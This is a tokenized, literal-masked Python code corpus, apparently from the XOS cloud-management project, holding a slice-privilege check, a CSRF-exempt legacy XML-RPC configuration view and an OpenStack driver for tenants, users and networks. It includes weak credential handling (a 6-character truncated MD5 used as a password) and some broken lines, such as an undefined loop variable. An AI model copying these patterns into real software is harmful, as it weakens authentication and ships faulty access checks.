: <EOL> if user . is_readonly : <EOL> return False <EOL> if user . is_admin : <EOL> return True <EOL> cprivs = ControllerSlicePrivilege . objects . filter ( slice_privilege__user = user ) <EOL> for cpriv in dprivs : <EOL> if cpriv . role . role == [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerSlicePrivilege . objects . all ( ) <EOL> else : <EOL> cpriv_ids = [ cp . id for cp in ControllerSlicePrivilege . objects . 
filter ( slice_privilege__user = user ) ] <EOL> qs = ControllerSlicePrivilege . objects . filter ( id__in = cpriv_ids ) <EOL> return qs </s>
<s> import os <EOL> import json <EOL> import socket <EOL> import sys <EOL> import time <EOL> import traceback <EOL> import xmlrpclib <EOL> from core . models import Slice , Instance , ServiceClass , Reservation , Tag , Network , User , Node , Image , Deployment , Site , NetworkTemplate , NetworkSlice <EOL> from django . http import HttpResponse <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> def ps_id_to_pl_id ( x ) : <EOL> return <NUM_LIT> + x <EOL> def pl_id_to_ps_id ( x ) : <EOL> return x - <NUM_LIT> <EOL> def pl_slice_id ( slice , slice_remap = { } ) : <EOL> if slice . name in slice_remap : <EOL> return int ( slice_remap [ slice . name ] [ <NUM_LIT:1> ] ) <EOL> else : <EOL> return ps_id_to_pl_id ( slice . id ) <EOL> def pl_slicename ( slice , slice_remap = { } ) : <EOL> if slice . name in slice_remap : <EOL> return slice_remap [ slice . name ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return slice . name <EOL> def filter_fields ( src , fields ) : <EOL> dest = { } <EOL> for ( key , value ) in src . items ( ) : <EOL> if ( not fields ) or ( key in fields ) : <EOL> dest [ key ] = value <EOL> return dest <EOL> def GetSlices ( filter = { } , slice_remap = { } ) : <EOL> ps_slices = Slice . objects . all ( ) <EOL> slices = [ ] <EOL> for ps_slice in ps_slices : <EOL> if ( filter ) and ( "<STR_LIT:name>" in filter ) : <EOL> remapped_name = slice_remap . get ( ps_slice . name , ( ps_slice . name , ) ) [ <NUM_LIT:0> ] <EOL> if ( remapped_name != filter [ "<STR_LIT:name>" ] ) : <EOL> continue <EOL> node_ids = [ ] <EOL> for ps_instance in ps_slice . instances . all ( ) : <EOL> node_ids . append ( ps_id_to_pl_id ( ps_instance . node . 
id ) ) <EOL> slice = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : pl_slice_id ( ps_slice , slice_remap ) , <EOL> "<STR_LIT>" : node_ids , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_id_to_pl_id ( ps_slice . site_id ) , <EOL> "<STR_LIT:name>" : pl_slicename ( ps_slice , slice_remap ) , <EOL> "<STR_LIT>" : ps_slice . name } <EOL> slices . append ( slice ) <EOL> return slices <EOL> def GetNodes ( node_ids = None , fields = None , slice_remap = { } ) : <EOL> if node_ids : <EOL> ps_nodes = Node . objects . filter ( id__in = [ pl_id_to_ps_id ( nid ) for nid in node_ids ] ) <EOL> else : <EOL> ps_nodes = Node . objects . all ( ) <EOL> nodes = [ ] <EOL> for ps_node in ps_nodes : <EOL> slice_ids = [ ] <EOL> for ps_instance in ps_node . instances . all ( ) : <EOL> slice_ids . append ( pl_slice_id ( ps_instance . slice , slice_remap ) ) <EOL> node = { "<STR_LIT>" : ps_id_to_pl_id ( ps_node . id ) , <EOL> "<STR_LIT>" : ps_id_to_pl_id ( ps_node . site_id ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_node . name . lower ( ) , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : slice_ids , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] } <EOL> nodes . append ( node ) <EOL> nodes = [ filter_fields ( node , fields ) for node in nodes ] <EOL> return nodes <EOL> def GetTags ( slicename , node_id ) : <EOL> return { } <EOL> def GetSites ( slice_remap = { } ) : <EOL> ps_sites = Site . objects . all ( ) <EOL> sites = [ ] <EOL> for ps_site in ps_sites : <EOL> slice_ids = [ ] <EOL> for ps_slice in ps_site . slices . all ( ) : <EOL> slice_ids . append ( pl_slice_id ( ps_slice , slice_remap ) ) <EOL> node_ids = [ ] <EOL> for ps_node in ps_site . nodes . all ( ) : <EOL> node_ids . append ( ps_id_to_pl_id ( ps_node . 
id ) ) <EOL> if ps_site . location : <EOL> longitude = ps_site . location . longitude <EOL> latitude = ps_site . location . latitude <EOL> else : <EOL> longitude = <NUM_LIT:0> <EOL> latitude = <NUM_LIT:0> <EOL> site = { "<STR_LIT>" : ps_id_to_pl_id ( ps_site . id ) , <EOL> "<STR_LIT>" : node_ids , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_site . abbreviated_name , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:name>" : ps_site . name , <EOL> "<STR_LIT:url>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : float ( longitude ) , <EOL> "<STR_LIT>" : float ( latitude ) , <EOL> "<STR_LIT>" : slice_ids , <EOL> "<STR_LIT>" : ps_site . login_base , <EOL> "<STR_LIT>" : None } <EOL> sites . append ( site ) <EOL> return sites <EOL> def GetInterfaces ( slicename , node_ids , return_nat = False , return_private = False ) : <EOL> interfaces = [ ] <EOL> ps_slices = Slice . objects . filter ( name = slicename ) <EOL> for ps_slice in ps_slices : <EOL> for ps_instance in ps_slice . instances . all ( ) : <EOL> node_id = ps_id_to_pl_id ( ps_instance . node_id ) <EOL> if node_id in node_ids : <EOL> ps_node = ps_instance . node <EOL> ip = socket . gethostbyname ( ps_node . name . strip ( ) ) <EOL> found_labeled_network = False <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> if ( port . network . owner != ps_slice ) : <EOL> continue <EOL> if port . network . labels and ( "<STR_LIT>" in port . network . labels ) : <EOL> ip = port . ip <EOL> found_labeled_network = True <EOL> if not found_labeled_network : <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) and ( template . translation == "<STR_LIT:none>" ) : <EOL> ip = port . 
ip <EOL> if return_nat : <EOL> ip = None <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) and ( template . translation == "<STR_LIT>" ) : <EOL> ip = port . ip <EOL> if not ip : <EOL> continue <EOL> if return_private : <EOL> ip = None <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) and ( template . translation == "<STR_LIT:none>" ) : <EOL> ip = port . ip <EOL> if not ip : <EOL> continue <EOL> interface = { "<STR_LIT>" : node_id , <EOL> "<STR_LIT>" : ip , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : node_id , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> interfaces . 
append ( interface ) <EOL> return interfaces <EOL> def GetConfiguration ( name , slice_remap = { } ) : <EOL> slicename = name [ "<STR_LIT:name>" ] <EOL> if "<STR_LIT>" in name : <EOL> node_id = name [ "<STR_LIT>" ] <EOL> else : <EOL> node_id = <NUM_LIT:0> <EOL> node_instance_tags = GetTags ( slicename , node_id ) <EOL> slices = GetSlices ( { "<STR_LIT:name>" : slicename } , slice_remap = slice_remap ) <EOL> perhost = { } <EOL> allinterfaces = { } <EOL> hostprivmap = { } <EOL> hostipmap = { } <EOL> hostnatmap = { } <EOL> nodes = [ ] <EOL> if len ( slices ) == <NUM_LIT:1> : <EOL> slice = slices [ <NUM_LIT:0> ] <EOL> node_ids = slice [ '<STR_LIT>' ] <EOL> nodes = GetNodes ( node_ids , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , slice_remap = slice_remap ) <EOL> nodemap = { } <EOL> for node in nodes : <EOL> nodemap [ node [ '<STR_LIT>' ] ] = node [ '<STR_LIT>' ] <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids ) <EOL> hostipmap = { } <EOL> for interface in interfaces : <EOL> if nodemap [ interface [ '<STR_LIT>' ] ] not in allinterfaces : <EOL> allinterfaces [ nodemap [ interface [ '<STR_LIT>' ] ] ] = [ ] <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> allinterfaces [ nodemap [ interface [ '<STR_LIT>' ] ] ] . 
append ( interface ) <EOL> if interface [ '<STR_LIT>' ] : <EOL> hostipmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> hostnatmap = { } <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids , return_nat = True ) <EOL> for interface in interfaces : <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> hostnatmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> hostprivmap = { } <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids , return_private = True ) <EOL> for interface in interfaces : <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> hostprivmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> for nid in node_ids : <EOL> instance_tags = GetTags ( slicename , nid ) <EOL> perhost [ nodemap [ nid ] ] = instance_tags <EOL> instances = GetSlices ( slice_remap = slice_remap ) <EOL> if node_id != <NUM_LIT:0> : <EOL> instances = [ slice for slice in instances if ( node_id in slice . node_ids ) ] <EOL> sites = GetSites ( slice_remap = slice_remap ) <EOL> for site in sites : <EOL> site [ "<STR_LIT>" ] = [ ] <EOL> timestamp = int ( time . 
time ( ) ) <EOL> return { '<STR_LIT:version>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : node_instance_tags , <EOL> '<STR_LIT>' : perhost , <EOL> '<STR_LIT>' : hostipmap , <EOL> '<STR_LIT>' : hostnatmap , <EOL> '<STR_LIT>' : hostprivmap , <EOL> '<STR_LIT>' : instances , <EOL> '<STR_LIT>' : allinterfaces , <EOL> '<STR_LIT>' : sites , <EOL> '<STR_LIT>' : nodes } <EOL> DEFAULT_REMAP = { "<STR_LIT>" : [ "<STR_LIT>" , <NUM_LIT> ] } <EOL> def HandleGetConfiguration1 ( ) : <EOL> configs = { } <EOL> for slicename in [ "<STR_LIT>" ] : <EOL> configs [ slicename ] = GetConfiguration ( { "<STR_LIT:name>" : slicename } , DEFAULT_REMAP ) <EOL> return configs <EOL> def HandleGetNodes1 ( ) : <EOL> return GetNodes ( slice_remap = DEFAULT_REMAP ) <EOL> def HandleGetSlices1 ( ) : <EOL> return GetSlices ( slice_remap = DEFAULT_REMAP ) <EOL> def HandleGetConfiguration2 ( name , slice_remap ) : <EOL> return GetConfiguration ( name , slice_remap = slice_remap ) <EOL> def HandleGetNodes2 ( slice_remap ) : <EOL> return GetNodes ( slice_remap = slice_remap ) <EOL> def HandleGetSlices2 ( slice_remap ) : <EOL> return GetSlices ( slice_remap = slice_remap ) <EOL> FUNCS = { "<STR_LIT>" : HandleGetConfiguration1 , <EOL> "<STR_LIT>" : HandleGetNodes1 , <EOL> "<STR_LIT>" : HandleGetSlices1 , <EOL> "<STR_LIT>" : HandleGetConfiguration2 , <EOL> "<STR_LIT>" : HandleGetNodes2 , <EOL> "<STR_LIT>" : HandleGetSlices2 } <EOL> @ csrf_exempt <EOL> def LegacyXMLRPC ( request ) : <EOL> if request . method == "<STR_LIT:POST>" : <EOL> try : <EOL> ( args , method ) = xmlrpclib . loads ( request . body ) <EOL> result = None <EOL> if method in FUNCS : <EOL> result = FUNCS [ method ] ( * args ) <EOL> return HttpResponse ( xmlrpclib . dumps ( ( result , ) , methodresponse = True , allow_none = <NUM_LIT:1> ) ) <EOL> except : <EOL> traceback . 
print_exc ( ) <EOL> return HttpResponseServerError ( ) <EOL> else : <EOL> return HttpResponse ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> slices = GetSlices ( slice_remap = DEFAULT_REMAP ) <EOL> nodes = GetNodes ( slice_remap = DEFAULT_REMAP ) <EOL> config = GetConfiguration ( { "<STR_LIT:name>" : "<STR_LIT>" } , slice_remap = DEFAULT_REMAP ) <EOL> print config <EOL> print slices <EOL> print nodes </s>
<s> import commands <EOL> import hashlib <EOL> from xos . config import Config <EOL> from core . models import Controller <EOL> try : <EOL> from openstack . client import OpenStackClient <EOL> has_openstack = True <EOL> except : <EOL> has_openstack = False <EOL> manager_enabled = Config ( ) . api_nova_enabled <EOL> class OpenStackDriver : <EOL> def __init__ ( self , config = None , client = None ) : <EOL> if config : <EOL> self . config = Config ( config ) <EOL> else : <EOL> self . config = Config ( ) <EOL> if client : <EOL> self . shell = client <EOL> self . enabled = manager_enabled <EOL> self . has_openstack = has_openstack <EOL> self . controller = None <EOL> self . admin_user = None <EOL> def client_driver ( self , caller = None , tenant = None , controller = None ) : <EOL> if caller : <EOL> auth = { '<STR_LIT:username>' : caller . email , <EOL> '<STR_LIT:password>' : hashlib . md5 ( caller . password ) . hexdigest ( ) [ : <NUM_LIT:6> ] , <EOL> '<STR_LIT>' : tenant } <EOL> client = OpenStackClient ( controller = controller , cacert = self . config . nova_ca_ssl_cert , ** auth ) <EOL> else : <EOL> admin_driver = self . admin_driver ( tenant = tenant , controller = controller ) <EOL> client = OpenStackClient ( tenant = tenant , controller = admin_driver . controller ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> return driver <EOL> def admin_driver ( self , tenant = None , controller = None ) : <EOL> if isinstance ( controller , int ) : <EOL> controller = Controller . objects . get ( id = controller . id ) <EOL> if not tenant : <EOL> tenant = controller . admin_tenant <EOL> client = OpenStackClient ( tenant = tenant , controller = controller , cacert = self . config . nova_ca_ssl_cert ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> driver . admin_user = client . keystone . users . find ( name = controller . admin_user ) <EOL> driver . controller = controller <EOL> return driver <EOL> def create_role ( self , name ) : <EOL> roles = self . 
shell . keystone . roles . findall ( name = name ) <EOL> roles_title = self . shell . keystone . roles . findall ( name = name . title ( ) ) <EOL> roles_found = roles + roles_title <EOL> if not roles_found : <EOL> role = self . shell . keystone . roles . create ( name ) <EOL> else : <EOL> role = roles_found [ <NUM_LIT:0> ] <EOL> return role <EOL> def delete_role ( self , filter ) : <EOL> roles = self . shell . keystone . roles . findall ( ** filter ) <EOL> for role in roles : <EOL> self . shell . keystone . roles . delete ( role ) <EOL> return <NUM_LIT:1> <EOL> def create_tenant ( self , tenant_name , enabled , description ) : <EOL> """<STR_LIT>""" <EOL> tenants = self . shell . keystone . tenants . findall ( name = tenant_name ) <EOL> if not tenants : <EOL> fields = { '<STR_LIT>' : tenant_name , '<STR_LIT>' : enabled , <EOL> '<STR_LIT:description>' : description } <EOL> tenant = self . shell . keystone . tenants . create ( ** fields ) <EOL> else : <EOL> tenant = tenants [ <NUM_LIT:0> ] <EOL> self . add_user_role ( self . admin_user . id , tenant . id , '<STR_LIT>' ) <EOL> return tenant <EOL> def update_tenant ( self , id , ** kwds ) : <EOL> return self . shell . keystone . tenants . update ( id , ** kwds ) <EOL> def delete_tenant ( self , id ) : <EOL> ctx = self . shell . nova_db . ctx <EOL> tenants = self . shell . keystone . tenants . findall ( id = id ) <EOL> for tenant in tenants : <EOL> instances = self . shell . nova_db . instance_get_all_by_filters ( ctx , <EOL> { '<STR_LIT>' : tenant . id } , '<STR_LIT:id>' , '<STR_LIT>' ) <EOL> client = OpenStackClient ( tenant = tenant . name ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> for instance in instances : <EOL> driver . destroy_instance ( instance . id ) <EOL> self . shell . keystone . tenants . delete ( tenant ) <EOL> return <NUM_LIT:1> <EOL> def create_user ( self , name , email , password , enabled ) : <EOL> users = self . shell . keystone . users . 
findall ( email = email ) <EOL> if not users : <EOL> fields = { '<STR_LIT:name>' : name , '<STR_LIT:email>' : email , '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : enabled } <EOL> user = self . shell . keystone . users . create ( ** fields ) <EOL> else : <EOL> user = users [ <NUM_LIT:0> ] <EOL> return user <EOL> def delete_user ( self , id ) : <EOL> users = self . shell . keystone . users . findall ( id = id ) <EOL> for user in users : <EOL> keys = self . shell . nova . keypairs . findall ( ) <EOL> for key in keys : <EOL> self . shell . nova . keypairs . delete ( key ) <EOL> self . shell . keystone . users . delete ( user ) <EOL> return <NUM_LIT:1> <EOL> def get_admin_role ( self ) : <EOL> role = None <EOL> for admin_role_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> roles = self . shell . keystone . roles . findall ( name = admin_role_name ) <EOL> if roles : <EOL> role = roles [ <NUM_LIT:0> ] <EOL> break <EOL> return role <EOL> def add_user_role ( self , kuser_id , tenant_id , role_name ) : <EOL> user = self . shell . keystone . users . find ( id = kuser_id ) <EOL> tenant = self . shell . keystone . tenants . find ( id = tenant_id ) <EOL> role = None <EOL> if role_name . lower ( ) == '<STR_LIT>' : <EOL> role = self . get_admin_role ( ) <EOL> else : <EOL> role = self . shell . keystone . roles . find ( name = role_name ) <EOL> role_found = False <EOL> user_roles = user . list_roles ( tenant . id ) <EOL> for user_role in user_roles : <EOL> if user_role . name == role . name : <EOL> role_found = True <EOL> if not role_found : <EOL> tenant . add_user ( user , role ) <EOL> return <NUM_LIT:1> <EOL> def delete_user_role ( self , kuser_id , tenant_id , role_name ) : <EOL> user = self . shell . keystone . users . find ( id = kuser_id ) <EOL> tenant = self . shell . keystone . tenants . find ( id = tenant_id ) <EOL> role = None <EOL> if role_name . lower ( ) == '<STR_LIT>' : <EOL> role = self . get_admin_role ( ) <EOL> else : <EOL> role = self . shell . keystone . 
roles . find ( name = role_name ) <EOL> role_found = False <EOL> user_roles = user . list_roles ( tenant . id ) <EOL> for user_role in user_roles : <EOL> if user_role . name == role . name : <EOL> role_found = True <EOL> if role_found : <EOL> tenant . remove_user ( user , role ) <EOL> return <NUM_LIT:1> <EOL> def update_user ( self , id , fields ) : <EOL> if '<STR_LIT:password>' in fields : <EOL> self . shell . keystone . users . update_password ( id , fields [ '<STR_LIT:password>' ] ) <EOL> if '<STR_LIT>' in fields : <EOL> self . shell . keystone . users . update_enabled ( id , fields [ '<STR_LIT>' ] ) <EOL> return <NUM_LIT:1> <EOL> def create_router ( self , name , set_gateway = True ) : <EOL> routers = self . shell . quantum . list_routers ( name = name ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = self . shell . quantum . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : name } } ) [ '<STR_LIT>' ] <EOL> if set_gateway : <EOL> nets = self . shell . quantum . list_networks ( ) [ '<STR_LIT>' ] <EOL> for net in nets : <EOL> if net [ '<STR_LIT>' ] == True : <EOL> self . shell . quantum . add_gateway_router ( router [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : net [ '<STR_LIT:id>' ] } ) <EOL> return router <EOL> def delete_router ( self , id ) : <EOL> routers = self . shell . quantum . list_routers ( id = id ) [ '<STR_LIT>' ] <EOL> for router in routers : <EOL> self . shell . quantum . delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> def add_router_interface ( self , router_id , subnet_id ) : <EOL> router = self . shell . quantum . show_router ( router_id ) [ '<STR_LIT>' ] <EOL> subnet = self . shell . quantum . show_subnet ( subnet_id ) [ '<STR_LIT>' ] <EOL> if router and subnet : <EOL> self . shell . quantum . add_interface_router ( router_id , { '<STR_LIT>' : subnet_id } ) <EOL> def delete_router_interface ( self , router_id , subnet_id ) : <EOL> router = self . shell . quantum . 
show_router ( router_id ) <EOL> subnet = self . shell . quantum . show_subnet ( subnet_id ) <EOL> if router and subnet : <EOL> self . shell . quantum . remove_interface_router ( router_id , { '<STR_LIT>' : subnet_id } ) <EOL> def create_network ( self , name , shared = False ) : <EOL> nets = self . shell . quantum . list_networks ( name = name ) [ '<STR_LIT>' ] <EOL> if nets : <EOL> net = nets [ <NUM_LIT:0> ] <EOL> else : <EOL> net = self . shell . quantum . create_network ( { '<STR_LIT>' : { '<STR_LIT:name>' : name , '<STR_LIT>' : shared } } ) [ '<STR_LIT>' ] <EOL> return net <EOL> def delete_network ( self , id ) : <EOL> nets = self . shell . quantum . list_networks ( ) [ '<STR_LIT>' ] <EOL> for net in nets : <EOL> if net [ '<STR_LIT:id>' ] == id : <EOL> self . delete_network_ports ( net [ '<STR_LIT:id>' ] ) <EOL> for subnet_id in net [ '<STR_LIT>' ] : <EOL> self . delete_subnet ( subnet_id ) <EOL> self . shell . quantum . delete_network ( net [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def delete_network_ports ( self , network_id ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == network_id : <EOL> self . shell . quantum . delete_port ( port [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def delete_subnet_ports ( self , subnet_id ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> delete = False <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id : <EOL> delete = True <EOL> break <EOL> if delete : <EOL> self . shell . quantum . delete_port ( port [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def create_subnet ( self , name , network_id , cidr_ip , ip_version , start , end ) : <EOL> subnet = None <EOL> subnets = self . shell . quantum . 
list_subnets ( ) [ '<STR_LIT>' ] <EOL> for snet in subnets : <EOL> if snet [ '<STR_LIT>' ] == cidr_ip and snet [ '<STR_LIT>' ] == network_id : <EOL> subnet = snet <EOL> if not subnet : <EOL> metadata_ip = cidr_ip . replace ( "<STR_LIT>" , "<STR_LIT:3>" ) <EOL> allocation_pools = [ { '<STR_LIT:start>' : start , '<STR_LIT:end>' : end } ] <EOL> subnet = { '<STR_LIT>' : { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : network_id , <EOL> '<STR_LIT>' : ip_version , <EOL> '<STR_LIT>' : cidr_ip , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : metadata_ip } ] , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : allocation_pools } } <EOL> subnet = self . shell . quantum . create_subnet ( subnet ) [ '<STR_LIT>' ] <EOL> return subnet <EOL> def update_subnet ( self , id , fields ) : <EOL> return self . shell . quantum . update_subnet ( id , fields ) <EOL> def delete_subnet ( self , id ) : <EOL> subnets = self . shell . quantum . list_subnets ( ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> if subnet [ '<STR_LIT:id>' ] == id : <EOL> self . delete_subnet_ports ( subnet [ '<STR_LIT:id>' ] ) <EOL> self . shell . quantum . delete_subnet ( id ) <EOL> self . delete_external_route ( subnet ) <EOL> return <NUM_LIT:1> <EOL> def get_external_routes ( self ) : <EOL> status , output = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> routes = output . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:3> : ] <EOL> return routes <EOL> def add_external_route ( self , subnet , routes = [ ] ) : <EOL> if not routes : <EOL> routes = self . get_external_routes ( ) <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> gw_ip = subnet [ '<STR_LIT>' ] <EOL> subnet_id = subnet [ '<STR_LIT:id>' ] <EOL> ip_address = None <EOL> for port in ports : <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id and fixed_ip [ '<STR_LIT>' ] == gw_ip : <EOL> gw_port = port <EOL> router_id = gw_port [ '<STR_LIT>' ] <EOL> router = self . shell . quantum . 
show_router ( router_id ) [ '<STR_LIT>' ] <EOL> if router and router . get ( '<STR_LIT>' ) : <EOL> ext_net = router [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == router_id and port [ '<STR_LIT>' ] == ext_net : <EOL> ip_address = port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> route_exists = False <EOL> if routes : <EOL> for route in routes : <EOL> if subnet [ '<STR_LIT>' ] in route and ip_address in route : <EOL> route_exists = True <EOL> if not route_exists : <EOL> cmd = "<STR_LIT>" % ( subnet [ '<STR_LIT>' ] , ip_address ) <EOL> s , o = commands . getstatusoutput ( cmd ) <EOL> return <NUM_LIT:1> <EOL> def delete_external_route ( self , subnet ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> gw_ip = subnet [ '<STR_LIT>' ] <EOL> subnet_id = subnet [ '<STR_LIT:id>' ] <EOL> ip_address = None <EOL> for port in ports : <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id and fixed_ip [ '<STR_LIT>' ] == gw_ip : <EOL> gw_port = port <EOL> router_id = gw_port [ '<STR_LIT>' ] <EOL> router = self . shell . quantum . show_router ( router_id ) [ '<STR_LIT>' ] <EOL> ext_net = router [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == router_id and port [ '<STR_LIT>' ] == ext_net : <EOL> ip_address = port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> cmd = "<STR_LIT>" % ( subnet [ '<STR_LIT>' ] ) <EOL> commands . getstatusoutput ( cmd ) <EOL> return <NUM_LIT:1> <EOL> def create_keypair ( self , name , public_key ) : <EOL> keys = self . shell . nova . keypairs . findall ( name = name ) <EOL> if keys : <EOL> key = keys [ <NUM_LIT:0> ] <EOL> if key . public_key != public_key : <EOL> self . delete_keypair ( key . id ) <EOL> key = self . shell . nova . keypairs . create ( name = name , public_key = public_key ) <EOL> else : <EOL> key = self . shell . nova . keypairs . 
create ( name = name , public_key = public_key ) <EOL> return key <EOL> def delete_keypair ( self , id ) : <EOL> keys = self . shell . nova . keypairs . findall ( id = id ) <EOL> for key in keys : <EOL> self . shell . nova . keypairs . delete ( key ) <EOL> return <NUM_LIT:1> <EOL> def get_private_networks ( self , tenant = None ) : <EOL> if not tenant : <EOL> tenant = self . shell . nova . tenant <EOL> tenant = self . shell . keystone . tenants . find ( name = tenant ) <EOL> search_opts = { "<STR_LIT>" : tenant . id , "<STR_LIT>" : False } <EOL> private_networks = self . shell . quantum . list_networks ( ** search_opts ) <EOL> return private_networks <EOL> def get_shared_networks ( self ) : <EOL> search_opts = { "<STR_LIT>" : True } <EOL> shared_networks = self . shell . quantum . list_networks ( ** search_opts ) <EOL> return shared_networks <EOL> def get_network_subnet ( self , network_id ) : <EOL> subnet_id = None <EOL> subnet = None <EOL> if network_id : <EOL> os_networks = self . shell . quantum . list_networks ( id = network_id ) [ "<STR_LIT>" ] <EOL> if os_networks : <EOL> os_network = os_networks [ <NUM_LIT:0> ] <EOL> if os_network [ '<STR_LIT>' ] : <EOL> subnet_id = os_network [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> os_subnets = self . shell . quantum . list_subnets ( id = subnet_id ) [ '<STR_LIT>' ] <EOL> if os_subnets : <EOL> subnet = os_subnets [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return ( subnet_id , subnet ) <EOL> def spawn_instance ( self , name , key_name = None , availability_zone = None , hostname = None , image_id = None , security_group = None , pubkeys = [ ] , nics = None , metadata = None , userdata = None , flavor_name = None ) : <EOL> if not flavor_name : <EOL> flavor_name = self . config . nova_default_flavor <EOL> flavor = self . shell . nova . flavors . find ( name = flavor_name ) <EOL> if not security_group : <EOL> security_group = self . config . 
